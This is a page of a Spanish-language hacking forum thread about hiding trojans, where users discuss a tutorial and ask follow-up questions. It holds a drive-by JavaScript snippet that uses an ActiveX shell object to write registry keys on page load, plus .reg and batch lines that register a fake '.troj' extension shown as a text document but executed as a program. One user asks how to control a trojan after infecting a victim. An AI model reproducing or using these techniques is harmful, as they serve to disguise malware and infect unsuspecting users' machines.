Páginas: 1 [2] 3
|
 |
|
Autor
|
Tema: Ocultación de troyanos (Leído 26752 veces)
|
kinky
Desconectado
Mensajes: 226
Entra en mi mundo
|
gracias por el super artículo y las explicaciones, es de lo mejor que he visto en ocultacion de troyanos, si encuentro algo mas no dudare en publicarlo..saludos!!
|
|
|
|
|
En línea
|
Ing. Desarrollo de Software
|
|
|
RaDioX - Noxz
Desconectado
Mensajes: 1.411
Toco 4 Años Mas....
|
pues ponle que meta un troyano en una cancion...y le mande ese archivo a un amigo con antivirus..el bicho ese se pilla que aunk escondido es un troyano?
|
|
|
|
|
En línea
|
 Where Hackers Must Live... I OWN. "KNOWLEDGE IS POWER" "KNOWLEDGE SHARED IS POWER LOSS!" El amor es algo placentero que te hace cruzar caminos dolorososQue Nos Gobiernen, Juzguen y Cuiden Las Putas Ya Que Sus Hijos Nos Han Fallado!!!!!!
|
|
|
Creature
Desconectado
Mensajes: 1.775
Mitad bohemio, mitad caballero
|
¿ ??? ?
Explicate mejor .::IsHaM::.
|
|
|
|
|
En línea
|
Toma mi mano sigueme, te mostrare lo que tu alma no ve! por equipaje solo lleva tu fé, por escudero el valor sieempree teen!
|
|
|
SnAkE
Desconectado
Mensajes: 5
¡Amo YaBB SE!
|
Bueno, toda esa explicacion es bastante buena, pero tengo una duda, la mejor manera para crearle la extension .troj a un win98 seria a traves del javascript, pero claro me podriais explicar como puedo meter este javascritp en mi web, para q al entrar le salga el error de secuencia en su pc. Todavia sigue valiendo este javascript:
#script# document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function f() { try { a1=document.applets ; a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}"); a1.createInstance(); Shl = a1.GetObject(); a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}"); try { Shl.RegWrite ("HKCR\\.troj\\", "trojfile"); Shl.RegWrite ("HKCR\\trojfile\\", "Documento de texto"); Shl.RegWrite ("HKCR\\trojfile\\NeverShowExt", ""); Shl.RegWrite ("HKCR\\trojfile\\shell\\open\\command\\", "%1 %*");
} catch(e) {} } catch(e) {} }
setTimeout("f()", 1000);
#/script#
(sustituye los simbolos "#script#" y "#/script#" por "<script>" y "</script>" para que funcione ).
Muchas gracias.
|
|
|
|
|
En línea
|
|
|
|
ricky_corral
Desconectado
Mensajes: 26
que viva y reine el nInTeNdO por SIEMPRE!!!
|
muy buen ensayo sobre ocultacion de troyanos me parecio excelente y perfecto gracias una pregunta, de donde sacaste toda esa informacion? sobres bye 8)
|
|
|
|
|
En línea
|
viva mexico
|
|
|
phorek
Desconectado
Mensajes: 1
¡Amo YaBB SE!
|
|
|
|
|
|
En línea
|
|
|
|
valerossy46
Desconectado
Mensajes: 1
¡Amo YaBB SE!
|
tengo un serio problema. he exo to lo q aqui se explica, sin nigun tipo de problema con los ejecutables normales (los d programas, como x ejemplo los clientes), pero si con los servidores, me hace algo muy extraño, es como si al ejecutarlo (q no lo ejecuta) descomprime una copia en el mismo directorio con la extension q yo le haya puesto. necesito ayuda ya no tengo ni idea de x q puede ser. muxas gracias.
|
|
|
|
|
En línea
|
|
|
|
PxM
Desconectado
Mensajes: 309
[PxM]
|
Pero es que no entiendo.... leo y leo el post y comprendo que es necesario contaminar el sistema... si, pero para contaminarlo se necesita un ejecutable o hacerlo a mano, (como ejecutable tomo también a .bat y .reg), ésto ya lo había pensado pero por lo mismo lo descarté... éso de las extensiones del registro modificadas para reconocer una extención "x" como ejecutable no puede ser sin que antes se haya "contaminado"... Pero ¡Si se contamina con un ejecutable!... que sería lo mismo que mandar el troyanito en exe... ¿no?
...
Lo de que cambies la extensión del troyano no tiene efecto en el antivirus al parecer ya que lo scannea igual.
|
|
|
|
|
En línea
|
|
|
|
Zorrohack
Desconectado
Mensajes: 845
Quisiera burlar la enfermedad asi como a los AVs
|
 oye Brujo y Creature hay una parte del codigo .reg que esta mal es donde dice: REGEDIT4 [HKEY_CLASSES_ROOT\.troj] @="trojfile" [HKEY_CLASSES_ROOT\trojfile] @="Documento de texto" "NeverShowExt"="" [HKEY_CLASSES_ROOT\trojfile\Shell\Open\Command] @=""%1" %*" esta parte del @=""%1" %*" esta mal ya que ese ese no es el valor que se debe escribir para que sea ejecutable,se debe escribir asi: @="\"%1\" %*" asi es que se escribira el valor para que se ejecute noten que si lo hacen de la otra manera el troyano nunca se ejecutara Perdonen que corrija al ADM. ajajaja que facil !!!
|
|
|
|
|
En línea
|
Progresamos porque hay Millones de imbeciles, maldicion jodi a McAfee,Panda,Kav,Norton, perdonen solo practicaba.
|
|
|
|
|
Thehacky
Desconectado
Mensajes: 5
¡Amo YaBB SE!
|
;)Oye Brujo encontre una manera de no tener que poner en hexadecimal esta parte:
@echo @=""%1" %*">>%TEMP%\troj.reg
solo pon lo siguiente:
@echo @="%%%11">>%TEMP%\-.reg
Ni tampoco esto:
@echo @="%SystemRoot%\system32\shell32.dll,-152">>%TEMP%\troj.reg
En vez de eso pon:
@echo @="shell32.dll,-152">>%TEMP%\-.reg
|
|
|
|
|
En línea
|
|
|
|
Thehacky
Desconectado
Mensajes: 5
¡Amo YaBB SE!
|
 ¿Quién ese estupido Anarko? Oye amigo conozco novatos pero tu te pasas!!!!!!!! Que tonto!!!
|
|
|
|
|
En línea
|
|
|
|
yhosi
Desconectado
Mensajes: 2
¡Amo YaBB SE!
|
brujo!!!! decime una cosa, despues que mi troyano ya infecto la maquina de la victima, como hago para usarlo?
|
|
|
|
|
En línea
|
|
|
|
-_-[S@BuEsOhAcK]-_-
Desconectado
Mensajes: 280
No tenes nada mas interesante que leer que esto?
|
como uso el troyan??? dios mio... en que se ha convertido este foro.... brujo sinceramente no veo cual es la necesidad de publicar un texto asi, si sabes muy bien que clase de personas lo van a leer y que clase de uso le van a dar.. despues se quejan la mala fama que tienen lo hackers en la comunidad (Que los confunden que lammers o como sea que les digan), si seguimos asi no llegamos a ningun lado
|
|
|
|
|
En línea
|
uh ah.. pone a franchela..
xD
|
|
|
®®
Colaborador
Desconectado
Mensajes: 5.267
|
tu no sabes el dicho "toda informacion es poca"?, es como todo, el texto esta como informacion y para el que le interese. si sabes la forma que tienen de ocultarlos sabras como detectarlos ¿no crees?.
|
|
|
|
|
En línea
|
|
|
|
|
Páginas: 1 [2] 3
|
|
|
|